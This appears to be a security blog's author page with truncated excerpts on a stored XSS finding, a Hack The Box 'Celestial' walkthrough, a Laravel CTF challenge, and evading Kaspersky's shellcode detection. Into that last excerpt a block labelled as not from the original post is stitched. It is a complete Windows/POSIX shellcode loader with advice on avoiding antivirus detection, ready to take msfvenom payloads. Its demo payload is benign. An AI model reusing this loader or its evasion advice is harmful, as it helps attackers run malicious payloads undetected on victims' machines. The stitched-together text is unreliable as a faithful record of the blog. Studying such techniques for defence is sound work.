
Hello security wizards,

I hope you are fine and healthy during these hard times. Recently, during testing, I discovered a Stored Cross-Site Scripting vulnerability rated 5.9 (Medium) with the CVSS v3.1 calculator, and I wanted to share the methodology I used to find it.

Background

The application I tested was a generic survey system where administrators could create surveys and logged-in users could complete them.

The Discovery

Before talking about the discovery, I would like to explain how, in my opinion, web applications are secured against XSS vulnerabilities.

So here we will be talking about Stored and Reflected XSS only, which are quite similar except that in a Stored XSS vulnerability our payload such…


Hello folks. Here I will describe step by step how to get root on Celestial, which has been retired.


The IP address of the box is 10.10.10.85.

Enumeration

root@h4d3s:~# nmap -sT -T5 -A 10.10.10.85
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-12 16:48 CEST
Nmap scan report for 10.10.10.85
Host is up (0.027s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.2-4.9 (95%), Linux 3.8-3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal). …

Hello readers,

I recently had the chance to try a web security challenge called ‘Admin Panel Takeover — 1’, made by @syed__umar and written with the Laravel PHP framework. As the title says, the goal of the challenge is to take over the admin account of the application.

**** If you want to try it , stop reading right now because this post will contain the solution ****

Lab setup

To try the challenge you need Docker installed and running (the docker service) on your machine; then run the following command to start the web application:

sudo docker run -it --rm uexpl0it/admin-panel-takeover:latest…


Hello readers !

I am Hadi, a 17-year-old security enthusiast.

While I was playing with the Kaspersky Lab 2017 free version, I tried various shellcodes from the Metasploit Framework. Unfortunately, Kaspersky Antivirus detected them all, but I discovered a way to evade Kaspersky's shellcode detection.

Basically, let's try a shellcode wrapper that uses the Windows.h header and the VirtualAlloc() function (which allocates new memory in which we store our shellcode; because we choose the page protection ourselves, we avoid problems with Data Execution Prevention). In this write-up I will use the ‘windows/x64/exec’ shellcode to spawn calc.exe :-) . …
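The wrapper sketched above, as an added example (this is not the author's code, and it carries no Metasploit payload). It allocates memory at run time, copies a payload into it, marks it executable and calls it. On Windows that is VirtualAlloc/VirtualProtect as the post describes; a POSIX mmap/mprotect path is included so the same file builds and runs on Linux. The payload is a constructed "return 42" stub for x86-64 and AArch64 so the result can be checked; msfvenom output would go in the same buffer. One caveat a practitioner would add: allocating the page as read/write and flipping it to read/execute only after the copy means it is never writable and executable at once, which both satisfies DEP and avoids the RWX allocation that many AV engines flag on its own.

```c
/* Added example: minimal shellcode wrapper (not from the original post).
 * Windows: VirtualAlloc/VirtualProtect.  POSIX: mmap/mprotect.
 * The payload is a constructed "return 42" stub, not a real shellcode. */
#define _DEFAULT_SOURCE
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

typedef int (*payload_fn)(void);

/* Constructed stub payloads that just return 42, one per architecture. */
#if defined(__x86_64__) || defined(_M_X64)
static const unsigned char demo_payload[] = {
    0xb8, 0x2a, 0x00, 0x00, 0x00, /* mov eax, 42 */
    0xc3                          /* ret         */
};
#define DEMO_ARCH_SUPPORTED 1
#elif defined(__aarch64__) || defined(_M_ARM64)
static const unsigned char demo_payload[] = {
    0x40, 0x05, 0x80, 0x52,       /* mov w0, #42 */
    0xc0, 0x03, 0x5f, 0xd6        /* ret         */
};
#define DEMO_ARCH_SUPPORTED 1
#else
static const unsigned char demo_payload[] = { 0x00 };
#define DEMO_ARCH_SUPPORTED 0
#endif

int demo_arch_supported(void) { return DEMO_ARCH_SUPPORTED; }

/* Copy `code` into fresh memory, make it executable and run it.
 * The page is mapped RW first and switched to RX after the copy, so it is
 * never writable and executable at the same time (W^X).  Returns the
 * payload's return value, or -1 on failure. */
int run_shellcode(const unsigned char *code, size_t len)
{
    payload_fn fn;
    int rc;

    if (code == NULL || len == 0)
        return -1;

#ifdef _WIN32
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem == NULL)
        return -1;
    memcpy(mem, code, len);
    DWORD old;
    if (!VirtualProtect(mem, len, PAGE_EXECUTE_READ, &old)) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return -1;
    }
    FlushInstructionCache(GetCurrentProcess(), mem, len);
    memcpy(&fn, &mem, sizeof fn);   /* data pointer -> function pointer */
    rc = fn();
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }
#if defined(__GNUC__)
    /* Required on AArch64 (separate I/D caches); harmless on x86-64. */
    __builtin___clear_cache((char *)mem, (char *)mem + len);
#endif
    memcpy(&fn, &mem, sizeof fn);   /* data pointer -> function pointer */
    rc = fn();
    munmap(mem, len);
#endif
    return rc;
}

/* Run the constructed stub; -1 if this architecture has no stub. */
int run_demo_payload(void)
{
    if (!demo_arch_supported())
        return -1;
    return run_shellcode(demo_payload, sizeof demo_payload);
}

int main(void)
{
    printf("payload returned %d\n", run_demo_payload());
    return 0;
}
```

Build with `gcc -o wrapper wrapper.c` on Linux or `cl wrapper.c` on Windows; the stub prints `payload returned 42`. Note that a real exec payload from msfvenom does not return to the caller in the same way, so with such a payload the return value and the cleanup after the call are irrelevant.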

About

Hadi Mene

hello world
